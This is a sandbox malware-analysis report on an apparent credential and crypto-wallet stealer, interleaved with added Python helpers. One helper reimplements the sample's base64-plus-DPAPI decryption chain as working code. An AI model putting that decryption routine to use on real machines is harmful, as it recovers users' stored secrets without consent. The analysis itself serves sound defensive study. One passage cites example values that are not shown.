                        • String ID: L}m$$"o~$R0e$bIv$xK^$|m{$}>
                        • API String ID: 0-3829165952
                        • Opcode ID: f245424869320f09b7433bd2bc485cae9c1d3093945b0439c1eede87a647e21e
                        • Instruction ID: 0e29ab269704beb8fcb60508657b29a7ce3cd14b598a0145f176ecbd907c7cc2
                        • Opcode Fuzzy Hash: f245424869320f09b7433bd2bc485cae9c1d3093945b0439c1eede87a647e21e
                        • Instruction Fuzzy Hash: FCB217F3A0C200AFE7046E2DEC8567ABBE9EF94720F16453DEAC5C7744EA3558018796
                        APIs
                          • Part of subcall function 006EA740: lstrcpy.KERNEL32(006F0E17,00000000), ref: 006EA788
                          • Part of subcall function 006EA920: lstrcpy.KERNEL32(00000000,?), ref: 006EA972
                          • Part of subcall function 006EA920: lstrcat.KERNEL32(00000000), ref: 006EA982
                          • Part of subcall function 006EA9B0: lstrlen.KERNEL32(?,00E491C8,?,\Monero\wallet.keys,006F0E17), ref: 006EA9C5
                          • Part of subcall function 006EA9B0: lstrcpy.KERNEL32(00000000), ref: 006EAA04
                          • Part of subcall function 006EA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 006EAA12
                          • Part of subcall function 006EA8A0: lstrcpy.KERNEL32(?,006F0E17), ref: 006EA905
                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,006F0D73), ref: 006DE4A2
                        • StrCmpCA.SHLWAPI(?,006F14F8), ref: 006DE4F2
                        • StrCmpCA.SHLWAPI(?,006F14FC), ref: 006DE508
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 006DEBDF
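Every API list in this report uses one fixed line shape: an optional "Part of subcall function <addr>:" prefix, then Api.MODULE, an optional argument list in the order the arguments sit on the stack, and the call-site address after "ref:". The helper below is an added example and is not part of the Joe Sandbox report or of the sample; it parses lines in that shape (the constructed sample input is copied from the function summaries on this page), groups call sites by capability, and names the flag values that matter for this sample (TH32CS_SNAPPROCESS, CRYPTPROTECT_UI_FORBIDDEN, CRYPT_STRING_BASE64). The capability taxonomy and the flag tables are this example's own assumptions, not Joe Sandbox signatures.

```python
import re
from collections import defaultdict

# Constructed sample input: API lines copied verbatim from the function summaries in this
# report. "Part of subcall function X:" marks a call made inside the callee at address X.
SAMPLE_LINES = r"""
• Part of subcall function 006EA9B0: lstrlen.KERNEL32(?,00E491C8,?,\Monero\wallet.keys,006F0E17), ref: 006EA9C5
• FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,006F0D73), ref: 006DE4A2
• StrCmpCA.SHLWAPI(?,006F14F8), ref: 006DE4F2
• FindNextFileA.KERNEL32(000000FF,?), ref: 006DEBDF
• CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 006D7281
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 006E961E
• Process32Next.KERNEL32(006F0ACA,00000128), ref: 006E9647
• sscanf.NTDLL ref: 006E6999
• ExitProcess.KERNEL32 ref: 006E69DA
"""

# One report line: optional subcall prefix, Api.MODULE, optional "(args)", then "ref: <addr>".
API_LINE = re.compile(
    r"^\s*•\s*"
    r"(?:Part of subcall function (?P<callee>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>.*)\))?"
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Analyst taxonomy (an assumption of this example, not a Joe Sandbox signature):
# which APIs evidence which stealer capability.
CAPABILITY_APIS = {
    "file_enum": {"FindFirstFileA", "FindNextFileA"},
    "base64_decode": {"CryptStringToBinaryA"},
    "dpapi_decrypt": {"CryptUnprotectData"},
    "time_check": {"GetSystemTime", "SystemTimeToFileTime"},
    "process_enum": {"CreateToolhelp32Snapshot", "Process32First", "Process32Next"},
}

# Named flag values worth reading off the argument lists: (api, argument index) -> {value: name}.
FLAG_NAMES = {
    ("CreateToolhelp32Snapshot", 0): {0x2: "TH32CS_SNAPPROCESS"},
    ("CryptUnprotectData", 5): {0x1: "CRYPTPROTECT_UI_FORBIDDEN"},
    ("CryptStringToBinaryA", 2): {0x1: "CRYPT_STRING_BASE64"},
}


def parse_api_line(line):
    """Return a dict for one API line, or None for headings and other non-API lines."""
    m = API_LINE.match(line)
    if not m:
        return None
    raw_args = m.group("args")
    callee = m.group("callee")
    return {
        "api": m.group("api"),
        "module": m.group("module"),
        "args": [a.strip() for a in raw_args.split(",")] if raw_args else [],
        "ref": m.group("ref").upper(),
        "callee": callee.upper() if callee else None,
    }


def parse_report(text):
    """Parse every API line in a block of report text, skipping everything else."""
    calls = []
    for line in text.splitlines():
        call = parse_api_line(line)
        if call:
            calls.append(call)
    return calls


def tag_capabilities(calls):
    """Map each capability to the set of call-site addresses ("ref") that evidence it."""
    found = defaultdict(set)
    for call in calls:
        for capability, apis in CAPABILITY_APIS.items():
            if call["api"] in apis:
                found[capability].add(call["ref"])
    return dict(found)


def describe_flags(call):
    """Name the flag arguments FLAG_NAMES knows about; '?' (unresolved) arguments are skipped."""
    names = []
    for (api, index), table in FLAG_NAMES.items():
        if call["api"] != api or index >= len(call["args"]):
            continue
        arg = call["args"][index]
        if re.fullmatch(r"[0-9A-Fa-f]+", arg):
            value = int(arg, 16)
            names.append(table.get(value, f"0x{value:X}"))
    return names
```

Running parse_report over a whole function summary and then tag_capabilities gives, per function, the call sites that back each behaviour (for the summary above, file_enum at 006DE4A2 and 006DEBDF); the "callee" field keeps the subcall addresses so the wallet-path builder at 006EA9B0 can be tied to the enumeration loop that calls it.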
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                        • String ID: \*.*
                        • API String ID: 433455689-1173974218
                        • Opcode ID: 998788ffc3b0c9f690404d72760973f94a5983a8be4e2eda95689dea9865b8f3
                        • Instruction ID: cf1cd00ff4b2a5c0270944047a27d8d67d9d36d1fea96c5195ab4578816002de
                        • Opcode Fuzzy Hash: 998788ffc3b0c9f690404d72760973f94a5983a8be4e2eda95689dea9865b8f3
                        • Instruction Fuzzy Hash: 0712B3719122489ADB54FBA1DC96EEE733BAF44300F4141ADB10A96092EF307F49CF96
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: 0ab+$97}s$?Ws_$@.?c$^.5$ck:
                        • API String ID: 0-3215478088
                        • Opcode ID: e8d11afe97f84c2ec42af0a1c8c11b21b731dea9ac1f51e13d76caead2ffccb4
                        • Instruction ID: 26abf7e3b30739c1048a9b667b7cfede8efa60e1a5bd3b50177609c651430b61
                        • Opcode Fuzzy Hash: e8d11afe97f84c2ec42af0a1c8c11b21b731dea9ac1f51e13d76caead2ffccb4
                        • Instruction Fuzzy Hash: DCB22AF3A0C2049FE3046E2DEC8567ABBE9EF94720F1A453DEAC5D3740EA7558048696
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: $LV~$Hz>$L=_{$s*9;$z{u$}W5
                        • API String ID: 0-745962142
                        • Opcode ID: ca7806d35819a908c372554138e4ef6b1bd20a7bc5e75f39aa7b79718c353317
                        • Instruction ID: 79f429bb42d08f32f4e3d7bbb146bf3ed9c00b4569a5ba7489c8916c40b82123
                        • Opcode Fuzzy Hash: ca7806d35819a908c372554138e4ef6b1bd20a7bc5e75f39aa7b79718c353317
                        • Instruction Fuzzy Hash: 78B218F3A0C2049FD7046E6DEC8566AFBE9EF94720F16893DEAC4C3344E63598058697
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: "o$#q}$1q;c$F9u*$JuVa$cuiO
                        • API String ID: 0-3120144723
                        • Opcode ID: ebafd384a30a03b06d519a133778ebd0683ebf4285e4dd93cfe210d30ed46cc0
                        • Instruction ID: 5edf0e6d90d7b0931197180dfec18bce27af086ad9d50d7d308018076306fc86
                        • Opcode Fuzzy Hash: ebafd384a30a03b06d519a133778ebd0683ebf4285e4dd93cfe210d30ed46cc0
                        • Instruction Fuzzy Hash: 8CB2F7F3A0C2049FE304AE2DEC8567ABBE9EF94320F16493DE6C4C7744EA7558418796
                        APIs
                        • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Nm,00000000,00000000), ref: 006D9AEF
                        • LocalAlloc.KERNEL32(00000040,?,?,?,006D4EEE,00000000,?), ref: 006D9B01
                        • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Nm,00000000,00000000), ref: 006D9B2A
                        • LocalFree.KERNEL32(?,?,?,?,006D4EEE,00000000,?), ref: 006D9B3F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: BinaryCryptLocalString$AllocFree
                        • String ID: Nm
                        • API String ID: 4291131564-3116952562
                        • Opcode ID: f99107f948422b7d0bc6627bff33d2e1af9cd6ff78529e81a4d13687fa7f010c
                        • Instruction ID: b09af947e209eed76eb475464ceec311492c4fa10a5632517651e5ef23aab672
                        • Opcode Fuzzy Hash: f99107f948422b7d0bc6627bff33d2e1af9cd6ff78529e81a4d13687fa7f010c
                        • Instruction Fuzzy Hash: 2311D2B4741208AFEB00CF64CC95FAA77B5FB89704F208089F9159B390C7B2AD01DBA0
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: 2"+s$E#o$Qsy$RK$$ow
                        • API String ID: 0-211963892
                        • Opcode ID: a34e90904763a471caeaca77998389a024f5d78db0d8353f4b3a243416dcba40
                        • Instruction ID: a88803bc89d8fd48dd161b64087bb2dbb54f4f0b1f858aa9a875bae110d59a17
                        • Opcode Fuzzy Hash: a34e90904763a471caeaca77998389a024f5d78db0d8353f4b3a243416dcba40
                        • Instruction Fuzzy Hash: 5BB225F36082009FE3046E2DDC8567AF7E5EF94720F1A4A3DEAC4C7744EA3598058697
                        APIs
                        • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 006DC871
                        • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 006DC87C
                        • lstrcat.KERNEL32(?,006F0B46), ref: 006DC943
                        • lstrcat.KERNEL32(?,006F0B47), ref: 006DC957
                        • lstrcat.KERNEL32(?,006F0B4E), ref: 006DC978
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$BinaryCryptStringlstrlen
                        • String ID:
                        • API String ID: 189259977-0
                        • Opcode ID: c4d8f6ab26dca4f3dcbc2de99147601995f923ef8d570e5a90f73d3dfc819762
                        • Instruction ID: d9ce0c1a490cfca6fa8136f4a9886b61ee0bae075f5dae06af69d37b6c3db5e1
                        • Opcode Fuzzy Hash: c4d8f6ab26dca4f3dcbc2de99147601995f923ef8d570e5a90f73d3dfc819762
                        • Instruction Fuzzy Hash: 8A416D75E1421EDBDB10DFA0CD89BFEB7B9BB48304F1081A8E509A6280D7745A85DF91
                        APIs
                        • GetSystemTime.KERNEL32(?), ref: 006E696C
                        • sscanf.NTDLL ref: 006E6999
                        • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 006E69B2
                        • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 006E69C0
                        • ExitProcess.KERNEL32 ref: 006E69DA
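The call order GetSystemTime, sscanf, SystemTimeToFileTime twice, ExitProcess is the shape of a hard-coded expiry (kill-date) check: the current SYSTEMTIME and a date parsed out of an embedded string are both converted to FILETIME so they can be compared as 64-bit integers, and one branch terminates the process. The report does not show the sscanf format string, the embedded date, or the direction of the compare, so the Python below is an added interpretation of that logic, not code from the sample or the report; it assumes a 'YYYY-MM-DD' date string and that an unparsable date lets execution continue.

```python
from datetime import datetime, timezone

# SystemTimeToFileTime expresses a SYSTEMTIME as 100-nanosecond ticks since 1601-01-01 UTC.
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def utc(year, month, day, hour=0, minute=0, second=0):
    """Build a timezone-aware UTC datetime (GetSystemTime also reports UTC)."""
    return datetime(year, month, day, hour, minute, second, tzinfo=timezone.utc)


def to_filetime(dt):
    """Mirror SystemTimeToFileTime: 64-bit count of 100 ns ticks since the FILETIME epoch."""
    delta = dt - FILETIME_EPOCH
    return (delta.days * 86400 + delta.seconds) * 10_000_000 + delta.microseconds * 10


def parse_deadline(text):
    """Stand-in for the sscanf call. The real format string is not visible in the report;
    this example assumes 'YYYY-MM-DD'. Returns None where sscanf would not fill all three
    fields, or where SystemTimeToFileTime would reject the resulting SYSTEMTIME (e.g. month 13)."""
    parts = text.strip().split("-")
    if len(parts) != 3 or not all(p.isdigit() for p in parts):
        return None
    try:
        return utc(*(int(p) for p in parts))
    except ValueError:
        return None


def should_exit(deadline_text, now=None):
    """True when the current time is past the embedded deadline, i.e. the path that reaches
    ExitProcess. Assumption: an unparsable deadline falls through to normal execution."""
    now = now or datetime.now(timezone.utc)
    deadline = parse_deadline(deadline_text)
    if deadline is None:
        return False
    return to_filetime(now) > to_filetime(deadline)
```

For triage the practical consequence is that a sample past its deadline exits before doing anything observable; re-running it with the guest clock set before the date, or patching the compare, restores the behaviour. The 1970 tick count below is the usual FILETIME/Unix epoch offset and doubles as a check that to_filetime is computed correctly.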
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Time$System$File$ExitProcesssscanf
                        • String ID:
                        • API String ID: 2533653975-0
                        • Opcode ID: d6fa9d02a6147282cd1d2cde891ce7c1ad5ce408777090e5c3337ab602e4589d
                        • Instruction ID: 645bc2b7067ece9187769d7595f13df3967849d84d1674696d19045919b9a266
                        • Opcode Fuzzy Hash: d6fa9d02a6147282cd1d2cde891ce7c1ad5ce408777090e5c3337ab602e4589d
                        • Instruction Fuzzy Hash: 3F21EB75D15209ABCF04EFE4D9459EEB7B6BF48300F04856EE406E3250EB345605CB69
                        APIs
                        • GetProcessHeap.KERNEL32(00000008,00000400), ref: 006D724D
                        • RtlAllocateHeap.NTDLL(00000000), ref: 006D7254
                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 006D7281
                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 006D72A4
                        • LocalFree.KERNEL32(?), ref: 006D72AE
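Three of the functions above form one chain. The two CryptStringToBinaryA calls with dwFlags 1 (CRYPT_STRING_BASE64) around a LocalAlloc are the standard size-query-then-decode pattern for base64 input; the later lstrlen/CryptStringToBinaryA/lstrcat function decodes and concatenates in the same way; and this function hands a blob to CryptUnprotectData with dwFlags 1 (CRYPTPROTECT_UI_FORBIDDEN, so the call can never pop a prompt), narrows the UTF-16 result with WideCharToMultiByte(CP_ACP) into the 0x400-byte buffer obtained from RtlAllocateHeap, and releases the DPAPI output with LocalFree. The Python below is an added example that reproduces that chain; it is not the sample's code. The DPAPI header constant is the fixed version word and provider GUID every DPAPI blob carries; the CP_ACP code page and the treatment of an oversized result are assumptions noted in the comments, and the decrypt step itself only works on Windows under the user who protected the data.

```python
import base64
import sys

# Every DPAPI blob starts with dwVersion = 1 followed by the provider GUID
# {DF9D8CD0-1501-11D1-8C7A-00C04FC297EB}, both little-endian.
DPAPI_HEADER = bytes.fromhex("01000000d08c9ddf0115d1118c7a00c04fc297eb")
CRYPTPROTECT_UI_FORBIDDEN = 0x1   # the dwFlags value the report shows for CryptUnprotectData


def decode_base64_like_crypt32(text):
    """CryptStringToBinaryA with CRYPT_STRING_BASE64 (flag 1) tolerates line breaks and spaces
    inside the encoded text. The report's two-call pattern (NULL buffer to learn the size,
    LocalAlloc, decode into it) collapses to one decode here."""
    compact = "".join(text.split())
    return base64.b64decode(compact, validate=True)


def is_dpapi_blob(blob):
    """Cheap check before handing data to CryptUnprotectData."""
    return blob[:len(DPAPI_HEADER)] == DPAPI_HEADER


def unprotect(blob):
    """CryptUnprotectData with CRYPTPROTECT_UI_FORBIDDEN, i.e. never prompt. Windows only,
    and only for the user (or machine) that protected the blob."""
    if sys.platform != "win32":
        raise OSError("DPAPI is only available on Windows")
    import ctypes
    from ctypes import wintypes

    class DATA_BLOB(ctypes.Structure):
        _fields_ = [("cbData", wintypes.DWORD), ("pbData", ctypes.POINTER(ctypes.c_char))]

    crypt32, kernel32 = ctypes.windll.crypt32, ctypes.windll.kernel32
    buf = ctypes.create_string_buffer(blob, len(blob))
    blob_in = DATA_BLOB(len(blob), ctypes.cast(buf, ctypes.POINTER(ctypes.c_char)))
    blob_out = DATA_BLOB()
    ok = crypt32.CryptUnprotectData(ctypes.byref(blob_in), None, None, None, None,
                                    CRYPTPROTECT_UI_FORBIDDEN, ctypes.byref(blob_out))
    if not ok:
        raise ctypes.WinError()
    try:
        return ctypes.string_at(blob_out.pbData, blob_out.cbData)
    finally:
        kernel32.LocalFree(blob_out.pbData)   # the LocalFree the report shows after the decrypt


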